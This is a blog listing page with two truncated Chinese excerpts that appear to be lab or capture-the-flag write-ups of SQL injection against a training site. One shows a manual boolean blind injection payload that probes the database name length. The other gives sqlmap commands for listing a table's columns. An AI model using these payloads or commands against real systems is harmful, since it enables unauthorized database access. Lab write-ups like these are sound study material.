摘要:
徒手盲注 http://injectx1.lab.aqlab.cn:81/Pass-10/index.php?id=1 and length(database())>11 当为>12,显示错误 所以数据库字符为12 然后对数据库名字进行猜测 第一个字符为 http://injectx1.lab.aq 阅读全文
摘要:
所用方法 sqlmap跑,get请求 通过之前的经验,知道了数据库是error,表是error_flag sqlmap.py -u "xxx.xxx.xx?id=" --colums -T 表名 -D 当前数据库名 查看列名及类型 sqlmap.py -u http://injectx1.lab.a 阅读全文